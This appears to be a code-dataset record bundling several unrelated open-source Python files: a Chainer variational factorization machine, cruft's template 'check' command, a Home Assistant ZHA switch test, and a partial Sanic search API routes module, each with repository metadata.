"MIT"
] | 1
|
2020-01-15T07:06:52.000Z
|
2020-01-15T07:06:52.000Z
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
    """Row-wise dot product: sum of the elementwise product over the last axis."""
    products = a * b
    return F.sum(products, axis=-1)
def batch_interactions(x):
    """Enumerate every ordered feature pair per batch row.

    Given ``x`` of shape (batchsize, n), returns two (batchsize, n**2)
    arrays: the first tiles the whole row n times, the second repeats
    each element n times, so zipping them yields all (i, j) pairs.
    Works on either NumPy or CuPy arrays via ``get_array_module``.
    """
    xp = cuda.get_array_module(x.data)
    n_feat = x.shape[1]
    paired_shape = (x.shape[0], n_feat ** 2)
    left = xp.tile(x.data, (1, n_feat))
    right = xp.repeat(x.data, n_feat).reshape(paired_shape)
    return left, right
class VFM(Chain):
    """Variational Factorization Machine.

    Models ``y ~ bias + sum_i(w_i x_i) + sum_ij(<v_i, v_j> x_i x_j)`` where
    the bias, the per-feature slopes ``w`` and the latent vectors ``v`` are
    Gaussian random variables with learned means (``mu``) and log variances
    (``lv``).  Each term also contributes a KL divergence against a N(0, 1)
    prior, weighted by ``lambda0``/``lambda1``/``lambda2`` in the loss.
    """

    # Large negative offset added to log variances at test time so sampling
    # collapses (numerically) onto the mean.
    lv_floor = -100.0

    def __init__(self, n_features=None, n_dim=1, lossfun=F.mean_squared_error,
                 lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
                 init_bias_lv=0.0, intx_term=True, total_nobs=1):
        """Build the model parameters.

        Parameters
        ----------
        n_features : int
            Total number of (sparse) feature columns.
        n_dim : int
            Dimensionality of the latent interaction vectors.
        lambda0, lambda1, lambda2 : float
            KL weights for the bias, slope and interaction terms.
        init_bias_mu, init_bias_lv : float
            Initial mean / log variance of the global bias.
        intx_term : bool
            If False, the pairwise interaction term is dropped
            (plain Bayesian linear regression).
        total_nobs : int
            Number of training observations; scales the KL penalty.
        """
        self.n_dim = n_dim
        self.n_features = n_features
        self.lossfun = lossfun
        self.lambda0 = lambda0
        self.lambda1 = lambda1
        self.lambda2 = lambda2
        self.intx_term = intx_term
        self.total_nobs = total_nobs

        # In contrast to the FM model, the slopes and latent vectors
        # will have means (mu) and log variances (lv) for each component.
        super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
                                  bias_lv=L.Bias(shape=(1,)),
                                  slop_mu=L.Bias(shape=(1, 1)),
                                  slop_lv=L.Bias(shape=(1, 1)),
                                  slop_delta_mu=L.EmbedID(n_features, 1,
                                                          ignore_label=-1),
                                  slop_delta_lv=L.EmbedID(n_features, 1,
                                                          ignore_label=-1),
                                  feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
                                  feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
                                  feat_delta_mu=L.EmbedID(n_features, n_dim,
                                                          ignore_label=-1),
                                  feat_delta_lv=L.EmbedID(n_features, n_dim,
                                                          ignore_label=-1))

        # Xavier-style initialization, heavily scaled down (the extra 1e3
        # factor keeps initial deviations from the group means tiny).
        c = np.sqrt(n_features * n_dim) * 1e3
        d = np.sqrt(n_features) * 1e3
        self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
        self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
        self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
        self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
        self.bias_mu.b.data[...] *= 0.0
        self.bias_mu.b.data[...] += init_bias_mu
        self.bias_lv.b.data[...] *= 0.0
        self.bias_lv.b.data[...] += init_bias_lv

    def term_bias(self, bs, train=True):
        """Sample the global bias, broadcast to the batch size.

        Returns the sampled bias of shape (bs,) and the KL divergence
        KL(N(mu_bias, var_bias) || N(0, 1)).
        """
        shape = (bs, 1,)
        bs_mu = F.broadcast_to(self.bias_mu.b, shape)
        bs_lv = F.broadcast_to(self.bias_lv.b, shape)
        # BUGFIX: apply the log-variance floor *before* sampling.  The
        # original code drew the bias first and only then lowered bs_lv,
        # so validation still sampled noisily — contradicting the intent
        # and the ordering used in term_slop / term_feat.
        if not train:
            bs_lv += self.lv_floor
        # Bias is drawn from a Gaussian with given mu and log variance.
        bias = F.flatten(F.gaussian(bs_mu, bs_lv))
        # Compute prior on the bias, so compute the KL div
        # from the KL(N(mu_bias, var_bias) | N(0, 1))
        kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
        return bias, kld

    def term_slop(self, loc, val, bs, nf, train=True):
        """Compute the slope contribution for each active feature.

        Returns the summed slope term of shape (bs,) and its KL penalty.
        """
        shape = (bs, nf)
        # Reshape all of our constants
        pr_mu = F.broadcast_to(self.slop_mu.b, shape)
        pr_lv = F.broadcast_to(self.slop_lv.b, shape)
        # This is either zero or a very negative number
        # indicating to sample N(mean, logvar) or just draw
        # the mean precisely
        if not train:
            pr_lv += self.lv_floor
        # The feature slopes are grouped together so that they
        # all share a common mean. Then individual features slop_delta_lv
        # are shrunk towards zero, which effectively sets features to fall
        # back on the group mean.
        sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
        sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
        coef = F.gaussian(sl_mu, sl_lv)
        slop = F.sum(coef * val, axis=1)
        # Calculate divergence between group mean and N(0, 1)
        kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
        # Calculate divergence of individual delta means and delta vars
        args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
        kld2 = F.gaussian_kl_divergence(*args)
        return slop, kld1 + kld2

    def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
        """Compute the factorized pairwise-interaction term.

        ``iloc``/``jloc`` index all ordered feature pairs (see
        ``batch_interactions``); returns the interaction term of shape
        (bs,) and its KL penalty.
        """
        # Change all of the shapes to form interaction vectors
        shape = (bs, nf * 2, self.n_dim)
        feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
        feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
        if not train:
            feat_lv_vec += self.lv_floor
        # Construct the interaction mean and variance
        # iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
        # dot(feat, feat) is (bs, nf)
        ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
                          feat_lv_vec + self.feat_delta_lv(iloc))
        jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
                          feat_lv_vec + self.feat_delta_lv(jloc))
        # feat is (bs, )
        feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
        # Compute the KLD for the group mean vector and variance vector
        kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
        # Compute the KLD for vector deviations from the group mean and var
        kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
                                        self.feat_delta_lv.W)
        return feat, kld1 + kld2

    def forward(self, loc, val, y, train=True):
        """ Given the sparse feature vector defined by location
        integers for the column index and the value at that index.
        y ~ c + sum(w_i x_i) + sum_ij( <v_i, v_j> * x_i * x_j)

        Parameters
        ----------
        val : array of float
            Values in the feature array. Should of shape (batchsize, n_feat_max)
        loc : array of int
            Location of the non-zero columns in the sparse vector. Should be of
            shape (batchsize, n_feat_max)
        y : array of float
            Array of expected outcome.
        train: bool
            If True uses the reparameterization trick to estimate variables.
            If False, this sets the variance to nearly zero such that
            parameters are always set to the mean with no noise, which is useful
            at test time.
        """
        bs = val.data.shape[0]
        nf = val.data.shape[1]
        iloc, jloc = batch_interactions(loc)
        ival, jval = batch_interactions(val)
        # Compute scalar bias term
        bias, kld0 = self.term_bias(bs, train=train)
        # Compute the feature weights
        slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
        # Compute factorized weights on interaction features
        feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
                                    bs, nf, train=train)
        # Optionally choose to include the interaction term
        # without this is linear regression
        pred = bias + slop
        if self.intx_term:
            pred += feat
        return pred, kld0, kld1, kld2

    def __call__(self, loc, val, y, train=True):
        """Compute the training loss: MSE plus the KL-weighted penalties.

        Reports loss / rmse / per-term KLDs to the chainer reporter and
        returns the scalar loss Variable.
        """
        bs = val.data.shape[0]
        pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
        # Compute MSE loss
        mse = F.mean_squared_error(pred, y)
        rmse = F.sqrt(mse)  # Only used for reporting
        # Now compute the total KLD loss
        kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
        # Total loss is MSE plus regularization losses
        loss = mse + kldt * (1.0 / self.total_nobs)
        # Log the errors
        logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
                'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
        reporter.report(logs, self)
        return loss
class TestModeEvaluator(extensions.Evaluator):
    """Evaluator that runs the model in test mode.

    Temporarily clears ``model.train`` so the VFM draws parameters at
    (numerically) their means during validation, then restores
    training mode before returning.
    """
    def evaluate(self):
        target = self.get_target('main')
        target.train = False
        result = super(TestModeEvaluator, self).evaluate()
        target.train = True
        return result
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
        resume=None, alpha=1e-3):
    """Train `model` with Adam using the chainer Trainer machinery.

    Parameters
    ----------
    model : VFM
        The model to optimize.
    train, valid : dataset
        Chainer datasets for training and validation.
    device : int
        GPU id, or a negative value to stay on CPU.
    batchsize, n_epoch, alpha : int, int, float
        Minibatch size, number of epochs, Adam learning rate.
    resume : str or None
        Path to a trainer snapshot (.npz) to resume from.
    """
    if device >= 0:
        chainer.cuda.get_device(device).use()
        model.to_gpu(device)
    optimizer = chainer.optimizers.Adam(alpha)
    optimizer.setup(model)
    # Setup iterators
    train_iter = chainer.iterators.SerialIterator(train, batchsize)
    valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
                                                  repeat=False, shuffle=False)
    updater = training.StandardUpdater(train_iter, optimizer, device=device)
    trainer = training.Trainer(updater, (n_epoch, 'epoch'),
                               out='out_' + str(device))
    # Setup logging, printing & saving
    # NOTE(review): several report keys below (kldg, kldi, hypg, hypi,
    # hypglv, hypilv) are never reported by VFM.__call__ — presumably left
    # over from an earlier model version; PrintReport tolerates missing keys.
    keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1']
    keys += ['kldg', 'kldi', 'hypg', 'hypi']
    keys += ['hypglv', 'hypilv']
    reports = ['epoch']
    reports += ['main/' + key for key in keys]
    reports += ['validation/main/rmse']
    # NOTE(review): two evaluators run over the same valid_iter — the
    # test-mode one and a plain one; the second looks redundant (it
    # evaluates with sampling noise) — confirm whether it is intentional.
    trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
    trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
    trainer.extend(extensions.dump_graph('main/loss'))
    trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
    trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
    trainer.extend(extensions.PrintReport(reports))
    trainer.extend(extensions.ProgressBar(update_interval=10))
    # If previous model detected, resume
    if resume:
        print("Loading from {}".format(resume))
        chainer.serializers.load_npz(resume, trainer)
    # Run the model
    trainer.run()
| 39.94697
| 79
| 0.592737
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
return F.sum(a * b, axis=-1)
def batch_interactions(x):
xp = cuda.get_array_module(x.data)
batchsize = x.shape[0]
shape = (batchsize, x.shape[1] ** 2)
left = xp.tile(x.data, (1, x.shape[1]))
right = xp.repeat(x.data, x.shape[1]).reshape(shape)
return left, right
class VFM(Chain):
lv_floor = -100.0
def __init__(self, n_features=None, n_dim=1 , lossfun=F.mean_squared_error,
lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
init_bias_lv=0.0, intx_term=True, total_nobs=1):
self.n_dim = n_dim
self.n_features = n_features
self.lossfun = lossfun
self.lambda0 = lambda0
self.lambda1 = lambda1
self.lambda2 = lambda2
self.intx_term = intx_term
self.total_nobs = total_nobs
super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
bias_lv=L.Bias(shape=(1,)),
slop_mu=L.Bias(shape=(1, 1)),
slop_lv=L.Bias(shape=(1, 1)),
slop_delta_mu=L.EmbedID(n_features, 1,
ignore_label=-1),
slop_delta_lv=L.EmbedID(n_features, 1,
ignore_label=-1),
feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
feat_delta_mu=L.EmbedID(n_features, n_dim,
ignore_label=-1),
feat_delta_lv=L.EmbedID(n_features, n_dim,
ignore_label=-1))
c = np.sqrt(n_features * n_dim) * 1e3
d = np.sqrt(n_features) * 1e3
self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
self.bias_mu.b.data[...] *= 0.0
self.bias_mu.b.data[...] += init_bias_mu
self.bias_lv.b.data[...] *= 0.0
self.bias_lv.b.data[...] += init_bias_lv
def term_bias(self, bs, train=True):
shape = (bs, 1,)
bs_mu = F.broadcast_to(self.bias_mu.b, shape)
bs_lv = F.broadcast_to(self.bias_lv.b, shape)
bias = F.flatten(F.gaussian(bs_mu, bs_lv))
# from a very narrow distribution about the mean.
# Useful for validation dataset when we want to only guess
# the mean.
if not train:
bs_lv += self.lv_floor
# Compute prior on the bias, so compute the KL div
# from the KL(N(mu_bias, var_bias) | N(0, 1))
kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
return bias, kld
def term_slop(self, loc, val, bs, nf, train=True):
shape = (bs, nf)
# Reshape all of our constants
pr_mu = F.broadcast_to(self.slop_mu.b, shape)
pr_lv = F.broadcast_to(self.slop_lv.b, shape)
# This is either zero or a very negative number
# indicating to sample N(mean, logvar) or just draw
# the mean preicsely
if not train:
pr_lv += self.lv_floor
# The feature slopes are grouped together so that they
# all share a common mean. Then individual features slop_delta_lv
# are shrunk towards zero, which effectively sets features to fall
# back on the group mean.
sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
coef = F.gaussian(sl_mu, sl_lv)
slop = F.sum(coef * val, axis=1)
# Calculate divergence between group mean and N(0, 1)
kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
# Calculate divergence of individual delta means and delta vars
args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
kld2 = F.gaussian_kl_divergence(*args)
return slop, kld1 + kld2
def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
# Change all of the shapes to form interaction vectors
shape = (bs, nf * 2, self.n_dim)
feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
if not train:
feat_lv_vec += self.lv_floor
# Construct the interaction mean and variance
# iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
# dot(feat, feat) is (bs, nf)
ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
feat_lv_vec + self.feat_delta_lv(iloc))
jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
feat_lv_vec + self.feat_delta_lv(jloc))
# feat is (bs, )
feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
# Compute the KLD for the group mean vector and variance vector
kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
# Compute the KLD for vector deviations from the group mean and var
kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
self.feat_delta_lv.W)
return feat, kld1 + kld2
def forward(self, loc, val, y, train=True):
bs = val.data.shape[0]
nf = val.data.shape[1]
iloc, jloc = batch_interactions(loc)
ival, jval = batch_interactions(val)
# Compute scalar bias term
bias, kld0 = self.term_bias(bs, train=train)
# Compute the feature weights
slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
# Compute factorized weights on interaction features
feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
bs, nf, train=train)
# Optionally choose to include the interaction term
# without this is linear regression
pred = bias + slop
if self.intx_term:
pred += feat
return pred, kld0, kld1, kld2
def __call__(self, loc, val, y, train=True):
bs = val.data.shape[0]
pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
# Compute MSE loss
mse = F.mean_squared_error(pred, y)
rmse = F.sqrt(mse) # Only used for reporting
# Now compute the total KLD loss
kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
# Total loss is MSE plus regularization losses
loss = mse + kldt * (1.0 / self.total_nobs)
# Log the errors
logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
reporter.report(logs, self)
return loss
class TestModeEvaluator(extensions.Evaluator):
def evaluate(self):
model = self.get_target('main')
model.train = False
ret = super(TestModeEvaluator, self).evaluate()
model.train = True
return ret
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
resume=None, alpha=1e-3):
if device >= 0:
chainer.cuda.get_device(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(alpha)
optimizer.setup(model)
# Setup iterators
train_iter = chainer.iterators.SerialIterator(train, batchsize)
valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (n_epoch, 'epoch'),
out='out_' + str(device))
# Setup logging, printing & saving
keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1']
keys += ['kldg', 'kldi', 'hypg', 'hypi']
keys += ['hypglv', 'hypilv']
reports = ['epoch']
reports += ['main/' + key for key in keys]
reports += ['validation/main/rmse']
trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
trainer.extend(extensions.PrintReport(reports))
trainer.extend(extensions.ProgressBar(update_interval=10))
# If previous model detected, resume
if resume:
print("Loading from {}".format(resume))
chainer.serializers.load_npz(resume, trainer)
# Run the model
trainer.run()
| true
| true
|
f70537ece98c2114c69c2bae94f8b653352137eb
| 1,406
|
py
|
Python
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 293
|
2020-08-18T05:52:45.000Z
|
2022-03-31T20:39:43.000Z
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 102
|
2020-08-28T16:38:34.000Z
|
2022-03-31T11:01:41.000Z
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 36
|
2020-08-28T16:34:10.000Z
|
2022-03-31T21:55:53.000Z
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
    project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
    """Report whether the project is up to date with its Cookiecutter template.

    Loads the project's cruft state file, fetches the template repository
    (optionally at `checkout`) into a temporary directory, and compares the
    recorded commit against the template's latest commit.  Prints a colored
    verdict and returns True when the project is current.
    """
    state_file = utils.cruft.get_cruft_file(project_dir)
    state = json.loads(state_file.read_text())
    with AltTemporaryDirectory() as template_dir:
        # Shallow, blob-less fetch: we only need commit metadata here.
        with utils.cookiecutter.get_cookiecutter_repo(
            state["template"],
            Path(template_dir),
            checkout,
            filter="blob:none",
            no_checkout=True,
        ) as repo:
            latest_commit = repo.head.object.hexsha
        if utils.cruft.is_project_updated(repo, state["commit"], latest_commit, strict):
            typer.secho(
                "SUCCESS: Good work! Project's cruft is up to date "
                "and as clean as possible :).",
                fg=typer.colors.GREEN,
            )
            return True
        typer.secho(
            "FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
            fg=typer.colors.RED,
        )
        return False
| 32.697674
| 97
| 0.619488
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
cruft_file = utils.cruft.get_cruft_file(project_dir)
cruft_state = json.loads(cruft_file.read_text())
with AltTemporaryDirectory() as cookiecutter_template_dir:
with utils.cookiecutter.get_cookiecutter_repo(
cruft_state["template"],
Path(cookiecutter_template_dir),
checkout,
filter="blob:none",
no_checkout=True,
) as repo:
last_commit = repo.head.object.hexsha
if utils.cruft.is_project_updated(repo, cruft_state["commit"], last_commit, strict):
typer.secho(
"SUCCESS: Good work! Project's cruft is up to date "
"and as clean as possible :).",
fg=typer.colors.GREEN,
)
return True
typer.secho(
"FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
fg=typer.colors.RED,
)
return False
| true
| true
|
f70538f65e8861717efd58fa60cfc24ef08b2d0d
| 3,288
|
py
|
Python
|
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
"""Test zha switch."""
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
# On/Off cluster command ids.
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
    """Mock zigpy device exposing Basic + OnOff input clusters on endpoint 1."""
    endpoint_spec = {
        1: {
            "in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
            "out_clusters": [],
            "device_type": 0,
        }
    }
    return zigpy_device_mock(endpoint_spec)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
    """Test zha switch platform.

    Covers: entity creation, availability transitions, device-originated
    attribute reports, HA-originated on/off service calls, and
    re-initialization (bind/configure_reporting) of a re-joined device.
    """
    zha_device = await zha_device_joined_restored(zigpy_device)
    cluster = zigpy_device.endpoints.get(1).on_off
    entity_id = await find_entity_id(DOMAIN, zha_device, hass)
    assert entity_id is not None
    # test that the switch was created and that its state is unavailable
    assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
    # allow traffic to flow through the gateway and device
    await async_enable_traffic(hass, zha_gateway, [zha_device])
    # test that the state has changed from unavailable to off
    assert hass.states.get(entity_id).state == STATE_OFF
    # turn on at switch
    # (attribute 0 = on_off reported with value 1)
    attr = make_attribute(0, 1)
    hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
    cluster.handle_message(hdr, [[attr]])
    await hass.async_block_till_done()
    assert hass.states.get(entity_id).state == STATE_ON
    # turn off at switch
    attr.value.value = 0
    cluster.handle_message(hdr, [[attr]])
    await hass.async_block_till_done()
    assert hass.states.get(entity_id).state == STATE_OFF
    # turn on from HA
    with patch(
        "zigpy.zcl.Cluster.request",
        return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
    ):
        # turn on via UI
        await hass.services.async_call(
            DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
        )
        # exactly one ZCL request, carrying the ON command id
        assert len(cluster.request.mock_calls) == 1
        assert cluster.request.call_args == call(
            False, ON, (), expect_reply=True, manufacturer=None
        )
    # turn off from HA
    with patch(
        "zigpy.zcl.Cluster.request",
        return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
    ):
        # turn off via UI
        await hass.services.async_call(
            DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
        )
        # exactly one ZCL request, carrying the OFF command id
        assert len(cluster.request.mock_calls) == 1
        assert cluster.request.call_args == call(
            False, OFF, (), expect_reply=True, manufacturer=None
        )
    # test joining a new switch to the network and HA
    cluster.bind.reset_mock()
    cluster.configure_reporting.reset_mock()
    await zha_gateway.async_device_initialized(zigpy_device)
    await hass.async_block_till_done()
    assert cluster.bind.call_count == 1
    assert cluster.bind.await_count == 1
    assert cluster.configure_reporting.call_count == 1
    assert cluster.configure_reporting.await_count == 1
| 31.615385
| 83
| 0.687956
|
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
endpoints = {
1: {
"in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
"out_clusters": [],
"device_type": 0,
}
}
return zigpy_device_mock(endpoints)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
    """End-to-end test of the zha switch: reports, service calls, re-join."""
    zha_device = await zha_device_joined_restored(zigpy_device)
    cluster = zigpy_device.endpoints.get(1).on_off
    entity_id = await find_entity_id(DOMAIN, zha_device, hass)
    assert entity_id is not None
    # entity is unavailable until traffic is enabled through the gateway
    assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
    # allow traffic to flow through the gateway and device
    await async_enable_traffic(hass, zha_gateway, [zha_device])
    # device starts off
    assert hass.states.get(entity_id).state == STATE_OFF
    # turn on at switch (simulated attribute report from the device)
    attr = make_attribute(0, 1)
    hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
    cluster.handle_message(hdr, [[attr]])
    await hass.async_block_till_done()
    assert hass.states.get(entity_id).state == STATE_ON
    # turn off at switch
    attr.value.value = 0
    cluster.handle_message(hdr, [[attr]])
    await hass.async_block_till_done()
    assert hass.states.get(entity_id).state == STATE_OFF
    # turn on from HA: the turn_on service must issue exactly one ON request
    with patch(
        "zigpy.zcl.Cluster.request",
        return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
    ):
        await hass.services.async_call(
            DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
        )
        assert len(cluster.request.mock_calls) == 1
        assert cluster.request.call_args == call(
            False, ON, (), expect_reply=True, manufacturer=None
        )
    # turn off from HA: the turn_off service must issue exactly one OFF request
    with patch(
        "zigpy.zcl.Cluster.request",
        return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
    ):
        await hass.services.async_call(
            DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
        )
        assert len(cluster.request.mock_calls) == 1
        assert cluster.request.call_args == call(
            False, OFF, (), expect_reply=True, manufacturer=None
        )
    # re-initialising the device must bind the cluster and configure
    # attribute reporting exactly once each
    cluster.bind.reset_mock()
    cluster.configure_reporting.reset_mock()
    await zha_gateway.async_device_initialized(zigpy_device)
    await hass.async_block_till_done()
    assert cluster.bind.call_count == 1
    assert cluster.bind.await_count == 1
    assert cluster.configure_reporting.call_count == 1
    assert cluster.configure_reporting.await_count == 1
| true
| true
|
f7053ab01509c24ced03b369dae6ac255d9ca094
| 4,288
|
py
|
Python
|
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
"""
This file contains all routes for the /search API
"""
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
    """
    Execute a departments query against the departments index.
    :param request:
    :return:
    """
    # Build an engine bound to the departments index and run the query
    engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
    result: SearchResult = await engine.departments_query(request)
    return json(request, result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
    """
    Combined content, counts and featured result query.
    :param request:
    :return:
    """
    # Optionally redirect everything to the conceptual search implementation
    if CONFIG.API.redirect_conceptual_search:
        return await conceptual_routes.search(request)
    engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
    combined_result = await engine.search(request)
    return json(request, combined_result, 200)
